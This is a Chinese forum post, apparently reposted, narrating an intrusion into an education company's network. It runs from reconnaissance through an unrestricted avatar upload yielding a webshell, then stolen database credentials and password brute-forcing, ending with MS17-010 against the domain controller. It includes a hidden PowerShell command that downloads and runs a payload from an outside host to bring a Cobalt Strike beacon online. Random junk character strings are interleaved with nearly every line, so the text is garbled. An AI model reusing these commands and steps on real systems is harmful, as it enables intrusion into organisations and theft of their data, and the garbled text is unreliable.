|
. L) f0 i- ~# P- v! M 这次渗透是一个从0到1,从外网到拿下域控的实战过程,希望可以给大家一些思路/ }0 o g, l8 ? ?
9 \! ^! ^: Y, X1 ~: u% c
" A. e3 N! ~7 ?: o# {/ Y/ [
& Q) b9 t, Y1 I% {
1 a' g; p% A% N0 t3 b5 P0 ^# B2 t" l, X; y' Z1 j
正文' p8 s" V' f. P$ J0 f
7 H- n4 n+ H6 U
+ P) U& B. f$ d ( Y/ Q8 q- Y3 e8 x0 u
$ g I* @! S B" R- \4 m0 Q1 n# q9 w
) j1 h: T" W; J/ Y) ]8 R4 N 目标:www.xxxx.com(一家教育机构)
1 A6 O7 j/ U) a/ ?. L
打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能. d( C7 A4 `! h* Y) n
' D$ U! h0 l5 F, ~& `; F
, n5 n/ X7 q/ B# t: H  # b8 a( I% o1 t! U: S0 \( [: n) m
" b9 W% _+ H e1 ~" G. g! I
; I, X, a4 ` I
进行了简单的信息搜集
8 c' z0 Y( j( a0 t1 s# E8 @+ O# c
) i" I1 I/ o6 b" V% d/ V% Y
6 D5 Q' ?8 }5 J# _7 z
! f; S6 y! L4 m3 o" H
6 L% e/ ^: w0 F. m! Z7 m 子域名搜集
' u; ]. B4 A6 K ' B$ v+ {- r* J+ G9 X1 t# t
6 z3 c3 O' D* K# B+ ~' q
$ Y. } D% T4 E' j* R- q9 v + ?" f1 B! T+ f& `
' {6 z. o6 O/ A: v
fofa找资产
% L% i# O& l) t1 S0 C' ?
. J7 w5 E0 x# w% Z
( o2 T# h* j' e: Y# O- b. i4 r
8 \2 n9 H. l5 E7 B! {3 T* @) P
$ @0 _% F. m, C j" e  ) c: X" ~9 ?" |$ q' d/ x
: b, t& X+ W' R
, ^7 ?' A0 A( m3 g+ S2 B" A 一共七个资产。去重之后只有两个。
5 o! \! z9 K% @
) Z- q, Q- W# m
% E4 A2 |" u8 ^* ]& _4 P; G; ?
7 n1 l4 S" i* A ~( g- P
# G8 s; u4 s0 t R 目录探测
8 V# O# Y& [, b$ r1 c
A* W# p L* G7 d! r) Y" C/ R, M7 `* X
 9 u4 b! o. h7 f8 H
U: W s0 H6 M6 k9 \5 ?
% ]4 _1 a7 w% [6 B" P
我尝试了暴力枚举,看有没有弱口令之类的,然而并没有
) J% L( S! T9 T
3 d1 s+ x2 `3 c6 R* l% q9 T- e
3 P2 p: q3 M# c: F3 V% f
, x# ]- j" X5 Z/ J5 v* R
% V1 m: A% e4 Y& A 我又尝试了通过修改返回包来绕过登录界面
7 u9 P8 C6 ~; a 5 r2 m: _' e% `) y8 r- ^0 I
- F. ~0 d% q5 R& h! g: R. x/ D, c
- f" _" K8 r O
7 @- T/ j) T$ I% p! R8 m; h( \# }3 e* R
" R- O8 q4 T6 G* _) |# W 还是不行,尝试注入无果0 F. w: h5 ~* q. Y
9 \) o. S+ n# h9 M
9 r$ g. s' w+ h2 B  2 R: a. k ]0 m( T9 J" \; R
9 r, D7 k1 d- h4 D3 T& \& {% g5 M2 N# ^
不过我目录探测出了一处Spring信息泄露
: O- `' H/ Y1 D- o" z5 k5 M0 n
, V$ r% Z3 `# w2 r% b, N
0 J' k* W" @+ o
1 Z) V( y: ` G2 K+ x2 x0 o, p) R; I3 z& O: j6 N7 Y, X2 a5 I
, w! k# j' p J" k9 ?* | ! y! a% L4 m! M% [3 a9 A/ y( D
; D/ K0 K; l7 ^ 尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录 Z. f$ M5 n% C- r9 S
/ M' p5 s' Y% z( T/ A9 U$ \1 [# H, Q+ Q
7 X5 Z! i6 i8 c; U8 q- [
 ) |3 O! D7 j" n# H
9 e; E" q7 q' x I) V+ H s% x
2 x/ x: y! B5 [# e* U, _- ~. B 后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。
) Y/ O( K/ n* I4 L3 H / Y% n% R! R& ?" S4 I2 y
/ V- D, Z2 r6 K
 ( `8 }" L v v
6 {% L( h4 @& [! o- u, y5 A! D
0 L) C; G, F2 ^) A: V6 q 获取有些师傅到这一步就手机抓包电脑测了。
& q5 V* y# Q: c! z& z+ g $ \: H d8 j. ?0 L
. q" T1 L6 j8 p8 g+ s+ Q Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。
L# h: c( z6 o0 u9 E! ?- Q - T) X. `. u+ j+ V4 H
: q. J+ M* w) @" u' q0 I8 d 其中在一个公众号发现了小程序,可以进行注册。
/ k" O7 s4 p( q) S
' B1 p9 b9 E4 s1 L; h+ t" N1 T6 l
看到了头像上传,尝试上传获取WebShell5 u- ?' U, T, r- N" @. K* `# o
# k- {2 B. ~7 T; m/ {# [1 W: X7 `1 ^2 p$ d
 + S0 q5 u' R! E) }! O
5 t# Z: R: Y: s: ]0 v
+ U" c* A4 D3 q/ Y* x. V 未做任何限制成功GetShell,上了冰蝎马,目录没权限访问; P; W* ^' S' Z r$ s5 d% S) P2 ]
: r) ~$ |/ h" F! _& Q; g% U
) K* U- g0 n0 z. H; ~' k' d  / B+ T0 b( h5 y; w# s5 f) G2 [( N
6 \. L7 p" ~+ F' _5 [4 m. y7 E- N/ u- g6 s
然后上了大马& g% T! t" j2 ~
1 q0 p4 P1 S4 W! v
. Y, J4 L/ e+ E% I6 {  / g! Y, |0 k+ k0 S
T- [" | Z. ~& ^9 a6 D, S2 g7 V
! i! f) W/ g- I 
7 d9 x( P( s2 Y
0 G6 G2 d% B/ ~4 ]9 l p. x7 O/ J+ X v3 d( _0 d" v I
通过翻找文件发现数据库账号密码
+ n$ O# P9 Z! x4 Z- ?
% W5 V) d! i- m/ `+ _! Z6 H1 O% {+ e* L- I
% \$ L! I, d2 ?! v 0 K0 w- i! W; P4 O6 |8 L) R7 T# p
7 o* G4 k2 i* m6 }, z: T# f
--内网渗透
8 x0 G9 a: q* ^5 t: R7 b" s0 `8 ^
" G6 N) A: Q1 |+ v7 W3 ?( P8 X/ }" D: q* g0 u$ d8 e* A$ @6 ~
直接通过powershell执行 cs上线 `" T/ y0 w5 G4 d, X
1 ?8 h1 p0 l% Q# |$ V
1 m8 M5 h7 y4 f9 O) D+ i2 N powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))"
- x r, v/ J0 W4 ~! i" K' o$ C) H0 H4 U
+ U5 ]0 F$ y8 @( Y% n0 g1 J7 i! m1 x) L
/ X( r; F6 N4 _" o& u ! ]; R! w+ l% p6 s$ H1 q8 ] }5 o
' L* z) A3 [4 R 进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破
- A/ d7 Y; a* J! u 9 Q5 u1 }$ B( @* s# f n# k3 A/ Q
& g5 @( T8 ~) N  3 Z9 _! [( Y& V1 e
P- U) x, R' R5 C% b5 }
6 ?6 k" K! z: L! c: R* z; o 登录爆破出来的服务器,发现多网卡且存在逻辑隔离。
0 c/ E5 u0 m6 i" }: I
6 F/ j* W. ]- f/ q
- `/ b& Q7 K( n7 Z( e% ]# I$ G, C* F, j6 _% S( Q
) R4 ?3 {. e. F7 H3 y
$ G, Y# T1 c( S: c
 6 N# H# L& n; r
! o9 w3 H3 g3 |
5 f+ H9 [3 ~8 q! I& S" Y, X5 E- M
通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
. H6 S0 Y8 Y A: `" P9 f ~4 R8 \
( a9 T8 B) u8 b6 {4 ?! ]% k3 u
/ v4 [( q1 u; h1 ?* \
* T- C& r. r. [% c0 q
% n v' I7 Q. @1 h1 w: D+ F1 W  9 c T% P, p; x* f7 u
: y7 \5 |; J+ k! Y. @( I
2 r7 j' X5 k( G: g
+ k, |) l8 b; ?# d6 n
! `/ ]' N# y: k( J. W. N8 w6 O4 K) d' I( ~0 c o& W6 P
2 Z3 _$ f: R0 Z: N. m+ D2 X' ^( g! r y" w; c* p0 t. |7 k
2 H- M- z' H: `4 U4 K . D$ v* M# a. D9 N$ g
& d& L! `& y4 c; o2 w- P/ c& T# u
小结7 ~( f& b6 N" B5 M; D
& L0 j3 A! T M8 d/ Q8 u ^
, E/ F& y4 V. n+ J6 K # J, U8 X' a- R- {
5 b; k7 i* O3 J& a- m% n1 C+ A2 S f! {: P) P( j
在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!
1 J0 ^) O8 C/ C/ k
1 N% H( F$ k" k
5 f+ Z# [ q1 Q8 q4 ?$ z, F
; Q1 F2 v" J5 Z5 U& u/ Z; U+ ~ $ B8 R5 T) r7 O- P8 [
2 V+ v( q. V; X& B8 ] -
9 _2 {$ l7 ]" g 3 T! }- K" |. V3 b! u' p
* S2 i6 J8 |0 r
- : M& _7 \3 a' M/ h% L3 o
! I# H0 V* Z* ^, |- s V# y1 P
: `7 J! t! ]) I: K# i" W5 h
. R% O! b* _/ I" ^* U+ I+ L* b) O5 R% z( v* K9 L& g7 {- _
作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html
0 L; P* @* w7 r8 g5 V2 _" r ! r1 B& Z9 ]0 N/ J2 a! r) N! I6 R2 Y& ^
/ |. ?+ U$ E1 B) ?( _! z. A. Z3 z
4 B3 |7 c1 C7 p0 A' x9 @ | 
发表于 2024-3-1 19:41:32
收藏
支持
反对